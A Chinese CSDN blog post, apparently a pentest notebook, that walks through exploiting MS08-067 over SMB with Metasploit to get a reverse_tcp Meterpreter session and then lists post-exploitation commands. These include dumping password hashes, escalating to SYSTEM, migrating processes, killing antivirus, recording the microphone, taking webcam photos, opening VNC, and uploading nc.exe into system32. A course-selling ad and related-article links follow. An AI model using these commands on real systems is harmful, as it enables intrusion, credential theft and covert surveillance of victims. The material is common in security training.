【渗透测试笔记】之【MSF Meterpreter Payload】_meterpreter的payload有哪些(1)

于 2024-05-13 10:42:43 发布
阅读量109 收藏
点赞数 1
分类专栏: 程序员 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968504/article/details/138792484
版权 
root@kali:~# msfconsole
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > show targets
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
msf5 exploit(windows/smb/ms08_067_netapi) > sessions
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1
# 获取到meterpreter session
meterpreter >

常用命令

# 保留session,返回msf
meterpreter >background
# 帮助
meterpreter >help
# linux移植命令(cd、ls、ps、cat、pwd、dir、mkdir、mv、rm、rmdir、edit(vi)等)
meterpreter >pwd
# lpwd查看本机当前工作目录



# 查看shell当前的uid
meterpreter >getuid
# 获取当且shell注入进程的pid
meterpreter >getpid
# 查看所有进程
meterpreter >ps
# 迁移到其它进程(跟进程id,一般迁移到explorer.exe)
meterpreter >migrate 652




# 查看当前用户权限
meterpreter >getprivs
# 获得system权限
meterpreter >getsystem
# hashdump获取账户密码哈希值
meterpreter >hashdump
# 杀死某个进程
meterpreter >kill 1524
# 获得目标shell
meterpreter >sehll
# 搜索目标主机上的文件
meterpreter >search -f win.ini



# 查看arp缓存
meterpreter >arp
# 查看开放端口
meterpreter >netstat
# 查看ip
meterpreter >ifconfig
# 路由表查看及更改帮助
meterpreter >route
meterpreter >route -h



# 查看空闲时间(没有进行操作的时间)
meterpreter >idletime
# 导入一个meterpreter操作文件
meterpreter >resource -r 1.txt



# 记录麦克风
meterpreter >record_mic
# 查看可使用的摄像头
meterpreter >webcam_list
# 每隔两秒拍一张照片
meterpreter >webcam_snap -i 2 -v false



meterpreter >lpwd
# 在本机进入某个目录
meterpreter >lcd /root/Desktop
# 在前台运行命令(后台运行为bgrun),按两下tab查看可用命令



meterpreter >run [按两下table]
# 杀死杀毒软件
meterpreter >run killav
# 桌面监视
meterpreter >run vnc



# 下载文件(会下载到lpwd)
meterpreter >download 1.txt
# 上传文件
meterpreter >upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/7b9909ab45943f4dbecdc8bba54f17c6.png)

![img](https://img-blog.csdnimg.cn/img_convert/3b5870d92028615aca5c99e2f2b6a202.png)

![img](https://img-blog.csdnimg.cn/img_convert/72de889f3fef8bf67965733d3ce7edfc.png)

![img](https://img-blog.csdnimg.cn/img_convert/f94db87819846d9e4f2f3f40e0f88346.png)

![img](https://img-blog.csdnimg.cn/img_convert/afc7a6f592bcf484eeba828387e5c89f.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84968504
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
MeterpreterMetasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
Meterpreter命令详解
热门推荐
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4640
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
渗透测试笔记】之【MSF Meterpreter Payload
AA8j的博客
11-07 590
Meterpreter 高级、动态、可扩展的payload。 完全基于内存的DLL注入式payload(不写硬盘)。 将自身注入系统进程并建立stager。 基于stager上传和预加载DLL进行扩展模块的注入(客户端API)。 基于stager建立的socket基础上再建立加密的TLS/1.0通信隧道。 利用TLS隧道进一步加载后续扩展模块。(避免网络取证) 服务器使用C语言编写。 客户端提供基于Ruby的全特性API(支持任何语言)。 ...
渗透测试 MSF Meterpreter Payload
erfan_lang的博客
08-13 211
渗透测试笔记】之【MSF Meterpreter Payload】 【Metasploit总结】之【payload】 通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,比如数据量的大小、校验位等,这样就相当于给已经分批的原始数据加一些外套,这些外套起标示作用,使得原始数据不易丢失,一批数据加上“外套”就形成了传输通道的基本传输单元,叫做数据帧或数据包,而其中的原始数据就是payload。 ...
MSFmeterpreter和普通shell的区别
00勇士王子的博客
09-24 2306
使用wireshark流量分析证明MSFmeterprete和普通shell的区别
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
69-69.渗透测试-Linux安装MSF.mp4
最新发布
05-10
69-69.渗透测试-Linux安装MSF.mp4
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
后渗透攻击命令和模块
Cwillchris的博客
04-12 1353
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4730
win10系统攻击msf
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3865
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
Meterpreter命令合集(详细)
2302_76986722的博客
09-16 2104
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
meterpreter木马原理分析
好好学习,天天向上
12-27 1179
本文主要分析meterpreter木马的原理,原理比较简单:首先会分配一段缓冲区,加载一段shellcode,在shellcode中调用win socket API与服务器端进行通信,下载一个反射型dll,在内存中加载,使用peb的方式来获取系统的api地址,C2的地址是以整数的方式存储在代码中。
Meterpreter的常用命令合集
妖魔鬼怪快离开的博客
11-25 1万+
getsystem #会自动利用各种各样的系统漏洞来进行权限提升 migrate #进程id进程迁移 background #把当前的会话设置为背景,需要的时候在启用 getuid #查看对方正在运行的用户 ps #列出所有的进程 getpid #返回运行meterpreter的id号 sysinfo #产看系统信息和体系结构 shell #切换到cmd的系统权限方式 e
手把手教你如何利用Meterpreter渗透Windows系统
weixin_34384557的博客
11-30 688
在这篇文章中,我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,以及获取用户键盘记录等等。 相关Payload Payload中包含有需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这...
了解Metasploit中的Payloads(有效载荷)
ddr12231的博客
05-07 2727
什么是payloadpayload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称为shellcode。 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 payloa...
MSF——Meterpreter(三)
dishan4749253的博客
09-09 617
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、简介 MeterpreterMetasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里...
Meterpreter扩展模块深度解析:功能与优势
"MSF Meterpreter扩展模块命令详解文档主要介绍了Meterpreter的概念、功能以及技术优势。MeterpreterMetasploit框架中的一个重要组件,用于溢出攻击后的后续控制,提供了一个强大的后渗透工具集。" Meterpreter是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值